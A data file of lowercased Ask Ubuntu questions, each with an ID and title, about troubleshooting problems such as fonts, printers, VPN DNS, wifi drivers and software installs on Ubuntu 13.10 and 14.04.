449578	x11 font -adobe-helvetica- % s- % s-*-*- % d-*-*-*-*-*-*-* , face 2 at size 11 could not be loaded	i am on ubuntu 13.10 , with r version 3.1.0 beta ( 2014-03-28 r65330 ) -- `` spring dance '' ( 64 bit ) . it is a new install and when trying to plot i am getting above error message error in title ( main = `` test '' , line = -1 ) : x11 font -adobe-helvetica- % s- % s -- - % d -- -- -- -* , face 2 at size 11 could not be loaded this is happening with x11 ( type= '' xlib '' ) i looked around a bit , but could only find quite old threads . prof. ripley replied to a similar issue in 2013 with see ? x11 and the 'r installation and administration manual ' . you are dragging up ancient history ( 2002 ) . the 'modern ' x11 device ( from 2007 ) uses cairographics and does not use x11 fonts . i suggest you take a look at how r was built and ensure that the cairo-based device is available . further , for a long time most x11 installations have been from xorg and not xfree86 , and do not generally have a config file . that unfortunately does n't help me , because i am using events : setgraphicseventhandlers ( prompt= '' click and drag to zoom , hit q to quit '' , onmousedown = dragmousedown , onmouseup = mouseup , onkeybd = keydown ) eventenv < - getgraphicseventenv ( ) getgraphicsevent ( ) and those are n't supported on any other device . it is still working on my other machine , so i presume i just need to find fonts somewhere . how do i install or generate those fonts on ubuntu ?
449579	rhythmbox does not start after upgrading to ubuntu 14.04	when i try to start rhythmbox its window remains only for few seconds then it disappears and i get `` an internal ubuntu error '' message . even if i try to open an mp3 file i see the same scenario . tried to reinstall it ( twice : d ) started from command line : ( rhythmbox:9164 ) : gtk-critical ** : gtk_css_provider_load_from_path : assertion 'path ! = null ' failed ( rhythmbox:9164 ) : glib-gobject-critical ** : object soupserver 0x2afc3e0 finalized while still in-construction ( rhythmbox:9164 ) : glib-gobject-critical ** : custom constructor for class soupserver returned null ( which is invalid ) . please use ginitable instead . unable to open ~/.mtpz-data for reading , mtpz disabled.segmentation fault ( core dumped ) update just found a bug report to launchpad : https : //bugs.launchpad.net/ubuntu/+source/rhythmbox/+bug/1299245 , but the problem does not seem to be fixed
449581	installation of processing2 under lts 14.04	can someone provide me with step-by-step instructions ? they only provide the file but no instructions here : https : //www.processing.org/download/ ? processing
449582	unmet dependency while installing cnijfilter-mp550series package	i 've been using my canon mp550 printer for some ubuntu versions now , and installation always worked : $ sudo add-apt-repository ppa : michael-gruz/canon-trunk $ sudo apt-get update $ sudo apt-get install cnijfilter-mp550series however , with a fresh 14.04 install i get this unmet dependency problem : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may to resolve the situation : the following packages have unmet dependencies : cnijfilter-mp550series : i386 : depends : libtiff4 : i386 ( > 3 . 9 . 5-3~ ) but it is not installable e : unable to correct problems , you have held broken packages .
449585	type '' is not known on line 3 in source list	i found this site where it says all the things i need to do and the commands in terminal and everything . so now i need to type in sudo apt-get update . i get this error : tomi @ ubuntu : ~ $ sudo apt-get update n : ignoring file 'getdeb.list.bck ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension e : type '' is not known on line 3 in source list /etc/apt/sources.list.d/libdvdcss.list e : the list of sources could not be read .
449586	usb devices not working before unplugging and plugging them again	on every new boot up my usb devices that are already plugged before boot does n't work properly . to be more specific . i have a tenda wireless adapter that is n't recognized after every boot up and i have to unplug it and then plug it again in order to work and connect to my network . also my microsoft wireless mouse is working after every boot up but scrolling with the wheel is very fast , like two pages per scroll . after i unplug it and re-plug it scrolling is back to normal speeds . i 'm on ubuntu 14.04 fresh install . if i can provide any more details please tell me how , and sorry for my english .
449589	why is upgrading from an lts to lts more safe than doing upgrades from the short term supports ?	how is an lts to lts upgrade different than a standard release to standard release upgrade ? are fresh installs usually preferred to guarantee a stable environment ?
449590	how to speed up virtualbox ubuntu 14.04 ( disable visual effects , ... )	i just installed ubuntu 14.04 in a virtualbox machine , which i am planning to use for java/web development . after my first steps , i noticed that the cpu usage is very high even when i do simple tasks like browsing files with nautilus . in htop i can see that it is compiz utilizing the cpu heavily . i have already tried to disable the effects and animations with compizconfig-settings-manager , but it did not change much . i would like to keep the new unity interface if possible . a list of steps that leads to the best result would be great .
449591	lscpu shows me `` op-mode:32-bit , 64-bit '' , what it means ?	lscpu outputs me this information : cpu op-mode ( s ) : 32-bit , 64-bit does this mean my ubuntu is running under 32 or 64 bits processor ?
449597	is there any user friendly alternative to screen ?	i am running ubuntu server and want to have multiple terminals . screen works fine but..it is not user friendly . i mean..after pressing ctrl+a you get no notification of you being in command mode , in order to display terminals you have to enter `` which is not friendly at all ( on my keyboard it is shift+1 ) , and so on.. i looked at byobu but it seems bugged : the cpu status lines keep increasing downside up and eventually cover my screen..but overall i still do n't like it much . i was searching for something with nano 's graphic..with bottom part of the screen filled with instruction/status and upper part , of course , my current terminal . does something like that exist ? or , alternatively , can you help me fix the byobu bug ?
449600	can not open xlsx files with libreoffice calc , application is grayed out	i am trying to open some xlsx files created probably from ms office excell app , and the calc just grays out after trying to load the file , and results to a non-responsive state . the only thing i can do is force a quit . i 've tried updating libreoffice and now i have this version : 3.5.7.2 . still no luck . is there something i can do ?
449604	ubuntu 14.04 64bit locks up after login	today i installed ubuntu 14.04 lts 64-bit . the installation went well with no sign of issues . on boot everything seems fine until i get to the login screen . after putting in my password and logging in the login screen disappears , however unity never loads and the mouse and keyboard become non-responsive . the only thing on the screen is the background image for the desktop . the only thing i can do at that point is force power down . some other possibly relevant info : computer is a dell vostro 3300 with nvidia optimus ( this laptop model came with 2 versions of optimus , mine is the 2nd version that can actively switch between discrete/onboard and does not require a reboot to do so ) unfortunately dell did not supply a way to disable optimus in bios on this model . tried fresh installs from 2 different flash drives and 2 live cds . no problems with previous installs of 12.04,12.10,13.04 and 13.10 . reinstalled 13.10 and then upgraded to 14.04 with same results . can interact with items on login screen with no issues . not sure what to try next ?
449605	unable to connect local server with ssh ?	i 'm using ubuntu 13.04 64-bit . when i 'm trying to connect with the local server it gives me following message and asking paasword even though it is configured with server . narasimhareddy @ narasimhareddy : ~ $ git clone git @ 192.168.1.3 : u-boot.git cloning into 'u-boot ' ... git @ 192.168.1.3 's password : connection closed by 192.168.1.3 fatal : could not read from remote repository .
449607	network connected , no internet	on laptop that i have been using for more than a year , ubuntu stopped allowing me direct access to the internet . it is a dual boot machine , if i reboot using my other ubuntu install , i have network/internet . laptop is connected to the network . i can access local machines on my network . if i create a socks proxy tunnel to another machine , i can also access the internet . when i remove/clear proxy settings , the internet is gone . i 'm completely flabbergasted by this problem . never seen anything like it . is there any way to get network without having to install ubuntu ?
449609	can i swap control and super keys using xmodmap ?	i am trying to swap the function of ctrl left and super left so that i can summon lenses usng ctrl , and copy/paste using super . i created a .xmodmap file with the following content : remove mod4 = super_l remove control = control_l add control = super_l add mod4 = control_l now super works as control , but control does n't work as super . any advice ? ps : i 've found other questions about this but none that addresses my issue s far . many thanks !
449612	how to play a sound after a command has finished its execution ?	i want to be noticed after a command has finished its execution . and i was thinking that if i hear a sound is a good idea . for example , because i have a slow internet connection , the following command take long time to execute : sudo apt-get update & & sudo apt-get upgrade so i let the terminal to run in background running the above command , but i want to hear a sound when it finished .
449614	disable home encryption in xubuntu	i chose full encryption and home encryption during install and now want to disable the latter . how do i do this in xubuntu ?
449619	sound 2.1 not working on 14.04	i have an inspiron 17r se 7720 , with ubuntu 14.04 installed , and i want to enable 2.1 audio . the os is installed as is , without changes . however , my subwoofer is n't working . and not working the multimedia buttons on keyboard to change volume and mute . i tried to solve the problem myself , and used all the information about a similar issue , but nothing has helped . here is some additional information : lspci | grep -i `` audio device '' 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) cat /proc/asound/card0/codec* | grep codec codec : idt 92hd91bxx codec : intel pantherpoint hdmi pulseaudio -- dump-conf # # # прочитать из файла конфигурации : /etc/pulse/daemon.conf # # # daemonize = no fail = yes high-priority = yes nice-level = -11 realtime-scheduling = yes realtime-priority = 5 allow-module-loading = yes allow-exit = yes use-pid-file = yes system-instance = no local-server-type = user cpu-limit = no enable-shm = yes flat-volumes = no lock-memory = no exit-idle-time = 20 scache-idle-time = 20 dl-search-path = /usr/lib/pulse-4.0/modules default-script-file = /etc/pulse/default.pa load-default-script-file = yes log-target = auto log-level = notice resample-method = speex-float-1 enable-remixing = yes enable-lfe-remixing = no default-sample-format = s16le default-sample-rate = 44100 alternate-sample-rate = 48000 default-sample-channels = 2 default-channel-map = front-left , front-right default-fragments = 8 default-fragment-size-msec = 10 enable-deferred-volume = yes deferred-volume-safety-margin-usec = 1 deferred-volume-extra-delay-usec = 0 shm-size-bytes = 0 log-meta = no log-time = no log-backtrace = 0 rlimit-fsize = -1 rlimit-data = -1 rlimit-stack = -1 rlimit-core = -1 rlimit-rss = -1 rlimit-as = -1 rlimit-nproc = -1 rlimit-nofile = 256 rlimit-memlock = -1 rlimit-locks = -1 rlimit-sigpending = -1 rlimit-msgqueue = -1 rlimit-nice = 31 rlimit-rtprio = 9 rlimit-rttime = 1000000
449620	after install ubuntu 14.04 not starting	first i installed windows 7 about 6 months , then i installed linux mint 16 yesterday , and today i installed ubuntu 14.04 . i tarted it from a usb key , after the installation the pc restarted , i clicked on ubuntu but it failed . please see the picture below : what can i do ?
449621	use compiz to render 3d anaglyph	i recently found out that compiz has or rather had a plugin which can be used to render the desktop in 3d anaglyph . but all the ppas are very old and do n't work on trusty . i wanted to know where can i get that plugin and whether it 'll work on 14.04 or not
449623	howto restore the new 14.04-lockscreen	i 'm using ubuntu 14.04 but since some weeks i 'm stuck with the old 13.10 lockscreen design for some reason . i already tried compizconfig-settings-manager but it does n't offer me any option for changing the lockscreen design and even resetting compiz and unity with dconf reset -f /org/compiz/ did n't help . are there any other ways to get the new lockscreen back ?
449624	`` fglrx installation requires that the system have kernel headers '' but i installed linux-headers-generic	i 'm trying to install the ati driver for my video . i 'm trying the manual installation . i downloaded the file in the home ( i renamed the file ati.run ) and i started it , but it gives error . opening log , the error is check if system has the tools required for installation . fglrx installation requires that the system have kernel headers . /lib/modules/3.13.0-24-generic/build/include/linux/version.h can not be found on this system . one or more tools required for installation can not be found on the system . install the required tools before installing the fglrx driver . optionally , run the installer with -- force option to install without the tools . forcing install will disable amd hardware acceleration and may make your system unstable . not recommended . i installed every package that i may need : gcc , build essential , make , linux-headers-generic what can i do ?
449626	where is my tablet memory hardware mounted on laptop ?	i connected my asus fonepad7 tablet to my laptop via usb . my laptop automatically detects it & opens . but i 'm unable to find where the memory card of my tablet mounted on laptop . just see below , when i put cursor on the tablet device , it shows `` mtp : // [ usb:002,003 ] / '' as i 'm unable to find the mount point , i ca n't use command line for accessing the tablet . also , commands `` mount '' & `` df '' does n't reflect anything regarding the tablet . i 'm working on ubuntu 13.04 edit # 1 as per one 's comment , please find the output of a command below . lsravbholua @ ravbholua-aspire-5315 : ~ $ lsblk name maj : min rm size ro type mountpoint sda 8:0 0 111.8g 0 disk ├─sda1 8:1 0 100m 0 part ├─sda2 8:2 0 31.2g 0 part ├─sda3 8:3 0 36.9g 0 part ├─sda4 8:4 0 1k 0 part ├─sda5 8:5 0 301.4m 0 part /boot ├─sda6 8:6 0 10.1g 0 part / ├─sda7 8:7 0 2.1g 0 part [ swap ] ├─sda8 8:8 0 5.6g 0 part /home ├─sda9 8:9 0 6.9g 0 part ├─sda10 8:10 0 14.1g 0 part └─sda11 8:11 0 3.3g 0 part sr0 11:0 1 1024m 0 rom
449629	error installing vmware workstation on ubuntu	i am trying to install vmware workstation 10.1 on ubuntu 14.04 and i got following errors . how do i fix it ? virtual machine monitor done virtual machine communication interface done vm communication interface socket family done blocking file system done virtual ethernet failed vmware authentication daemon done
449631	problems installing zimbra on vps	i have some problems installing zimbra collaboration on my vps with ubuntu server 12.04 . i tried many solutions found on google , but with no results : ( configuring snmp ... done . setting up syslog.conf ... done . starting servers ... error : could not create the java virtual machine . error : a fatal exception has occurred . program will exit . unable to determine enabled services from ldap . enabled services read from cache . service list may be inaccurate . sh : zmcontrol.status.b3gtn : permission denied sh : zmcontrol.status.b3gtn : permission denied sh : zmcontrol.status.b3gtn : permission denied sh : zmcontrol.status.b3gtn : permission denied sh : zmcontrol.status.b3gtn : permission denied sh : zmcontrol.status.b3gtn : permission denied sh : zmcontrol.status.b3gtn : permission denied sh : zmcontrol.status.b3gtn : permission denied sh : zmcontrol.status.b3gtn : permission denied sh : zmcontrol.status.b3gtn : permission denied sh : zmcontrol.status.b3gtn : permission denied done . sh : line 1 : could : command not found installing common zimlets ... com_zimbra_ymemoticons ... failed . this may impact system functionality . com_zimbra_attachmail ... failed . this may impact system functionality . com_zimbra_proxy_config ... failed . this may impact system functionality . com_zimbra_viewmail ... failed . this may impact system functionality . com_zimbra_clientuploader ... failed . this may impact system functionality . com_zimbra_bulkprovision ... failed . this may impact system functionality . com_zimbra_email ... failed . this may impact system functionality . com_zimbra_date ... failed . this may impact system functionality . com_zimbra_webex ... failed . this may impact system functionality . com_zimbra_url ... failed . this may impact system functionality . com_zimbra_srchhighlighter ... failed . this may impact system functionality . com_zimbra_attachcontacts ... failed . this may impact system functionality . com_zimbra_tooltip ... failed . this may impact system functionality . com_zimbra_adminversioncheck ... failed . this may impact system functionality . com_zimbra_phone ... failed . this may impact system functionality . com_zimbra_cert_manager ... failed . this may impact system functionality . finished installing common zimlets . restarting mailboxd ... done . creating galsync account for default domain ... error : could not create the java virtual machine . error : a fatal exception has occurred . program will exit . /opt/zimbra/bin/zmshutil : line 39 : error : command not found failed . you have the option of notifying zimbra of your installation ...
449635	ubuntu installation on oldish laptop	i have installed ubuntu on a laptop , a packard bell easynote b3600 , amd sempron . is anyone familiar with the installation problems on this machine ? for instance the bios settings , compared to the settings in ubuntu as specified under f6 . acpi on or off etc ... in the setup i am confronted with a dialog-box : 'the system is running in low-graphics mode ' . i have been trying to install ubuntu on the specified machine , i 've been trying for 4 days now ! ! booting from dvd as well as from usb , but not with the right results . looking forward to reading your answer/s ! ! ! tom
449636	is trim enabled in xubuntu 14.04 by default ?	is trim enabled in all official derivatives of ubuntu 14.04 by default ?
449638	changing 100 % from xp to ubuntu	around 6 months ago i installed ubuntu from a cd i burned from an internet download , with the intention of running it for while to see how i got on with it compared to xp . now i 'm completely happy with it , in despair with the way xp has begun to `` perform '' , i want to go the whole way . my problem is that when i first started the installation i was asked how much disk space i wanted to allocate , i have 160 gb total , so i chose 50gb , or thereabouts , which has left round 85gb for windows plus around 15gb for `` f '' drive ( i think it was created by the previous owner ) . i have kept ubuntu reasonably up to date , and currently have `` saucy salamander '' up and running , although i believe there may be a later version . i have backed up all my files on xp onto a portable hard drive ready for the big move . my question is how do i get windows back to 0 and increase ubuntu to the maximum gb available ? will i have to uninstall ubuntu completely , re-install it again and next time i 'm asked about the disk space select 100 % , or 160 gb , then simply go through the basics of re-installing any add-ons , then install any updates since my cd version ( or would it be better to simply download the latest version and install from that ? ) . or is there a `` magic button/formula '' somewhere that says give all the xp disk space over to ubuntu and wipe xp for ever ? i am far from being a techy person , i 'm only going to use ubuntu as a simple desktop for internet/email , some media playing and some libre office , so i 'd appreciate any answers as simple as possible , thats to say idiot proof : - )
449639	why do i have two bluetooth icons after the ubuntu 14.04 upgrade ?	since i upgraded to ubuntu 14.04 lts ( `` trusty tahr '' ) this afternoon , i now have two bluetooth icons shown in my system tray ... why do i have two bluetooth icons now shown , and how can i remove one of them ? this is not a duplicate of this : - why do i have 2 bluetooth icons on my panel ? in that question , the icons appear to be the same ( mine are different , with very different options under each ) and the poster wants to remove both ... i want to identify the reason there are two , and remove just one of the icons .
449640	no unity 3d support , intel hd 4600 , ubuntu 13.10/14.04	so i 've got this killer pc i use for gpgpu programming . hardware : intel i7-4770k ( integrated intel hd4600 ) 2x nvidia geforce gtx780ti i want to use the gtx'es only for cuda programming . it 's a clean install of ubuntu 14.04 at the moment , but having the same issues as i had with 13.10 . no nvidia driver has been installed yet . my bios is configured to send output to integrated graphics . the problem is that i do not have hardware rendering ! if i run `` /usr/lib/nux/unity_support_test -p '' opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 3.4 , 256 bits ) opengl version string : 2.1 mesa 10.1.0 not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no for `` lshw -c video '' i get *-display unclaimed description : vga compatible controller product : gk110b [ geforce gtx 780 ti ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller cap_list configuration : latency=0 resources : memory : da000000-daffffff memory : d0000000-d7ffffff memory : d8000000-d9ffffff ioport : e000 ( size=128 ) memory : db000000-db07ffff *-display unclaimed description : vga compatible controller product : gk110b [ geforce gtx 780 ti ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller cap_list configuration : latency=0 resources : memory : ca000000-caffffff memory : c0000000-c7ffffff memory : c8000000-c9ffffff ioport : d000 ( size=128 ) memory : cb000000-cb07ffff *-display description : vga compatible controller product : xeon e3-1200 v3/4th gen core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 06 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:46 memory : db400000-db7fffff memory : b0000000-bfffffff ioport : f000 ( size=64 ) clean install , nothing special , i do n't even think the two nvidia cards play any role as they are clearly not configured at the moment . edit : this might be interesting , from xorg.0.log [ 889.451 ] ( ii ) intel ( 0 ) : randr 1.2 enabled , ignore the following randr disabled message . [ 889.451 ] ( == ) intel ( 0 ) : dpms enabled [ 889.451 ] ( ww ) intel ( 0 ) : [ dri2 ] direct rendering is not supported when vga arb is necessary for the device [ 889.451 ] ( == ) intel ( 0 ) : hotplug detection : `` enabled '' [ 889.451 ] ( -- ) randr disabled [ 889.451 ] ( ii ) found 2 vga devices : arbiter wrapping enabled [ 889.454 ] ( ii ) selinux : disabled on system [ 889.455 ] ( ii ) aiglx : screen 0 is not dri2 capable [ 889.455 ] ( ee ) aiglx : reverting to software rendering edit2 : so does this say `` there are two vga devices so i need vga arbiter wrapping . because i need vga arbiter wrapping , direct rendering ( dri ) is not possible . if dri is not possible , unity is not possible '' . any way of bypassing this ? surely this is fixable ? any ideas ?
449641	linux-ubuntu problem : can not find mysql database after connection is made to mysql	i have a war file deployed in webapps folder at /srv/apache-tomcat-7.0.53/webapps/ war name is inindia.war i have deployed inindiadb.properties in classpath which is /srv/apache-tomcat-7.0.53/lib contents of inindiadb.properties : jdbc.driverclassname=com.mysql.jdbc.driver jdbc.url=jdbc : mysql : //localhost:3306/inindia jdbc.username=root jdbc.password=admin i have mysql installed and running netstat -vulntp |grep -i mysql tcp 0 0 127.0.0.1:3306 0.0.0.0 : * listen 563/mysqld mysql database has inindia database and inindia has 3 tables ( place , user_roles , users ) mysql > show databases ; + -- -- -- -- -- -- -- -- -- -- + | database | + -- -- -- -- -- -- -- -- -- -- + | information_schema | | inindia | | mysql | | performance_schema | | test | + -- -- -- -- -- -- -- -- -- -- + 5 rows in set ( 0.00 sec ) mysql > use inindia ; reading table information for completion of table and column names you can turn off this feature to get a quicker startup with -a database changed mysql > show tables ; + -- -- -- -- -- -- -- -- -- -+ | tables_in_inindia | + -- -- -- -- -- -- -- -- -- -+ | place | | user_roles | | users | + -- -- -- -- -- -- -- -- -- -+ 3 rows in set ( 0.00 sec ) the problem is when i restart my tomcat , a connection is made to the mysql but in tomcat logs it says that catalina.out : severe : error listenerstart apr 18 , 2014 11:02:17 am org.apache.catalina.core.standardcontext startinternal severe : context [ /inindia ] startup failed due to previous errors localhostlocalhost.2014-04-18.log : info : initializing spring root webapplicationcontext apr 18 , 2014 10:50:11 am org.apache.catalina.core.standardcontext listenerstart severe : exception sending context initialized event to listener instance of class com.inindia.listener.applicationinfoloaderlistener org.springframework.jdbc.badsqlgrammarexception : statementcallback ; bad sql grammar [ select * from place order by placename ] ; nested exception is com.mysql.jdbc.exceptions.jdbc4.mysqlsyntaxerrorexception : table 'inindia.place ' does n't exist i am not able to figure out the error . the error says that inindia.place can not be found but the database as well as table is present . it connects to the url mentioned in inindiadb.properties file i even wrote a java class to connect to the mysql server and displayed as output data of one of the tables . connection and data fetching both were successful . even i deployed the same on my local tomcat in windows which is deployed properly.hence the war doest seem to have a problem i am new to linux.please let me know if there any setting to be made in mysql server.like giving previlage to database or something similar
449642	network only using one dns when connected to vpn	my company has a vpn that i need to connect to . in osx , i do this by using openvpn with the following configuration : client dev tun proto udp remote < gateway_address > < port > resolv-retry infinite nobind user nobody group nobody persist-key persist-tun ca /users/tommy/.openvpn/dev/ca-dev.crt cert /users/tommy/.openvpn/dev/tommy.brunn-20131122-dev.crt key /users/tommy/.openvpn/dev/tommy.brunn-20131122-dev.key ns-cert-type server tls-auth /users/tommy/.openvpn/dev/ta-dev.key 1 cipher bf-cbc comp-lzo verb 3 auth-nocache ; daemon ; writepid openvpn.pid in ubuntu , i 've installed network-manager-openvpn and added a new vpn connection ( trying to import the config file caused a crash ) with the same configuration options set : screenshots of my settings once i connect to the vpn , i ca n't resolve any domains whatsoever . if i edit /etc/networkmanager/networkmanager.conf , comment out the line dns=dnsmasq and restart network-manager , i can resolve internal domains from my company , but other domains like google.com wo n't resolve at all . i 've made sure to set my `` method '' to `` automatic ( vpn ) addresses only '' in the ipv4 and ipv6 tabs of the network manager for my vpn connection , but it does n't seem to make any difference . i 've also tried re-enabling dnsmasq and modifying /etc/resolvconf/resolv.conf.d/base to contain nameserver 127.0.1.1 , then running sudo resolveconf -u , but then no domains will resolve again . what i would like is to be able to connect to my vpn so that domains pushed by my company 's dns server are resolved that way , and all other domains are resolved normally . edit : turns out dnsmasq was n't actually installed , which i thought it would be by default . nevertheless , if i install it , re-enable it in /etc/networkmanager/networkmanager.conf , add the local nameserver address in /etc/resolvconf/resolv.conf.d/base , restart all the services and connect to the vpn , i can resolve domains from the company dns , but i ca n't resolve any other domains . so basically the same situation as when i disabled dnsmasq entirely . edit : contents of /etc/dnsmasq.conf : http : //paste.ubuntu.com/7297231/
449643	vmware player warns me of no swap whenever i launch a vm	i just installed 14.04 desktop , using `` automatic partition setting '' by the installer , with the `` encrypt entire hard disk '' option . i installed the latest vmware ( version date apr 17th ) . now whenever i launch one of my old vms ( have n't tried making a new one yet ) , i get a warning dialog box with the following text : '' vmware player recommends 512 mb of system swap space for the set of currently running virtual machines . 0 bytes of system swap space is available . for optimum performance increase the amount of system swap space , or configure all virtual machine memory to use reserved host ram under preferences . '' ... with an ok button underneath . i 'm getting it a few seconds after i ask it to launch the vm , but i think it 's before it starts booting ( but not sure ) . this message did n't appear in 13.10 with the older vmware player . i 'm worried i might be doing something seriously wrong . is it telling me i do n't have swap on my host machine ? ( if so , how can i check that ? gparted only shows the top-level partitions , maybe my swap area is inside the encrypted partition . ) do i really need the swap on my host ? ( i have 8gb of ram , and i 'm running 2 vms at a time , each with 1 gb of ram ) . should i turn this warning off ? ( there 's a checkbox for that ) or is it telling me my vm does n't have a swap area ? here 's what i get when i type df -h in my vm : filesystem size used avail use % mounted on /dev/sda1 19g 4.1g 14g 23 % / none 497m 164k 497m 1 % /dev none 501m 0 501m 0 % /dev/shm none 501m 80k 501m 1 % /var/run none 501m 0 501m 0 % /var/lock none 501m 0 501m 0 % /lib/init/rw and here 's what i get when i type it in my host machine : filesystem size used avail use % mounted on /dev/mapper/ubuntu -- vg-root 680g 78g 567g 13 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 3.9g 8.0k 3.9g 1 % /dev tmpfs 789m 1.2m 787m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 3.9g 276k 3.9g 1 % /run/shm none 100m 84k 100m 1 % /run/user /dev/sda2 237m 54m 171m 24 % /boot /dev/sda1 511m 3.4m 508m 1 % /boot/efi /home/karjala/.private 680g 78g 567g 13 % /home/karjala
449645	download donation	something i wanted to ask before but always forgot . when downloading ubuntu , the donation page pops-up . the only way to donate is via paypal . i do not have a paypal account any-more ( closed it after bad experiences ) . please , provide a means to donate by credit card . thanks
449646	how to set variables for java	on ubuntu 14 , i have the same problem : when i run android studio , java packages are not find . i need to do export command ? export path= $ { path } : '' /usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java '' it 's do nothing more .
449648	is it possible to show launcher on a non-primary monitor ?	i 'm using the new ubuntu 14.04 lts and have an annoying problem . i have 3 monitors connected to my computer and i would like to have the unity launcher show on my left screen while using my middle display as the primary screen . i 've tried changing around the settings regarding launcher placement but it seems to make whatever screen you choose to put the launcher on to the primary screen , which causes issues in fullscreen apps and overall workflow for me . i 'm using manually installed nvidia-drivers . xrandr gives me this and this is my xorg.conf
449649	no dock in xubuntu 14.04	i have installed xubuntu 14.04 , but do not have a dock at the bottom of the screen . has the dock been removed in xubuntu 14.04
449651	how do i enable wobbly windows ?	just a short question , i made a clean install of ubuntu 14.04 yesterday and i have installed compizconfig settings manager and ubuntu-restricted-extras , but i am still unable to enable wobbly windows . what do i need to enable it ?
449652	full disc encryption with ssd	i 'm about to reinstall ubuntu onto my laptop . if i use full encryption , which i desire , how will this impact performance of the ssd and fstrim ? will i still be able to use it or will it be unnecessary ? does full disc encryption simply create a giant file into which all my files go or does it create a barrier at the start of the disc and encrypts/decrypts files on the fly as i have seen both systems used in the past .
449654	installing burg : ppa not working	i 'm trying to install burg to substiture grub , on ubuntu 14.04 ( i need dual boot with windows 7 ) i 've tried to install burg-manager , to install burg from there . it seems all ok , it does n't give errors , but at the start there is grub there 's is n't `` burg '' folder in /boot and burg-emu does n't start so i tried to install it with repositories , i tried with that bean repository , n-muench 's one , and sourceslist.eu , but when i do sudo apt-get update i see these lines w : failed to fetch http : //ppa.launchpad.net/n-muench/burg/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/n-muench/burg/ubuntu/dists/trusty/main/binary-i386/packages 404 not found in fact , `` burg-pc '' `` burg '' `` burg-emu '' and the other ones are `` not found packages '' how can i install and configure burg ? edit : i resolved it in `` software and updates '' - > `` other software '' i modify the ppa of n-muench replacing `` trusty '' with `` saucy '' , then i did sudo apt-get update sudo apt-get install burg burg-themes and the installation went fine ! then i configured burg with burg-manager , launching it , `` restoring burg to mbr '' , then changing themes ecc
449655	wget corrupts files while downloading	i have slow download speed ( ~128kb ) , wget ( gnu wget 1.13.4 built on linux-gnu . ) on ubuntu 13.10 . and it becomes usual that after file is downloaded with interruptions and starting wget again with key `` -c '' , checksums are not meet . wget says `` the file is already fully retrieved ; nothing to do . '' restart downloading and it can be fine . is it normal behaviour ?
449656	how to open port 8000 in ubuntu server 10.04	i want to open port 8000 in my ubuntu server 10.04 for port forwarding on a dvr . the router is properly configured on the client side but my server is not listening to port 8000 from outside world . can anyone help me in this . its kind of urgent to solve this issue . thanks.. : ) vineet .
449658	networkmanager tray ( nm-applet ) is gone after upgrade to 14.04 trusty	i upgraded from 13.10 to 14.04 and now the nm-applet no longer shows in the system tray . i already tried purging and reinstalling the network-manager-gnome package but that did n't help . when i run nm-applet manually in the terminal i get the following output : ** ( nm-applet:7419 ) : warning ** : could n't connect to accessibility bus : failed to connect to socket /tmp/dbus-gbrnqctavj : connection refused i tried multiple system trays : i3bar ( my default ) , trayer and the xfce4-panel . other tray apps work in all three of them ( like dropbox ) . the network manager itself works , as it connects to known networks and outputs notifications . does someone know how to fix this ?
449661	wifi [ ath9k ] not working on 14.04 lts	it 's work on debian 7 but not on ubuntu how do i fix it . i ca n't enable it . rfkill unblock all rfkill list 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : acer-wireless : wireless lan soft blocked : yes hard blocked : no lsmod | grep -e 'ath|brcmsmac' ath9k 164164 0 ath9k_common 13551 1 ath9k ath9k_hw 453856 2 ath9k_common , ath9k ath 28698 3 ath9k_common , ath9k , ath9k_hw mac80211 626489 1 ath9k cfg80211 484040 3 ath , ath9k , mac80211 ath3k 13318 0 bluetooth 395423 23 bnep , ath3k , btusb , rfcomm dmesg | grep -e 'cfg|ath|wlan' [ 0.930410 ] loaded x.509 cert 'magrathea : glacier signing key : 00a5a65759de474bc5c43120880c1b94a539f431' [ 9.291368 ] usbcore : registered new interface driver ath3k [ 9.300678 ] cfg80211 : calling crda to update world regulatory domain [ 9.320226 ] ath : phy0 : disable pll powersave [ 9.328827 ] ath : phy0 : aspm enabled : 0x43 [ 9.328831 ] ath : eeprom regdomain : 0x60 [ 9.328832 ] ath : eeprom indicates we should expect a direct regpair map [ 9.328834 ] ath : country alpha2 being used : 00 [ 9.328835 ] ath : regpair used : 0x60 [ 9.454629 ] cfg80211 : world regulatory domain updated : [ 9.454633 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 9.454634 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 9.454636 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 9.454638 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 9.454639 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 9.454640 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 10.225331 ] sku : nid=0x1d sku_cfg=0x40e5812d [ 10.225566 ] realtek : no valid ssid , checking pincfg 0x40e5812d for nid 0x1d [ 13.027048 ] ipv6 : addrconf ( netdev_up ) : 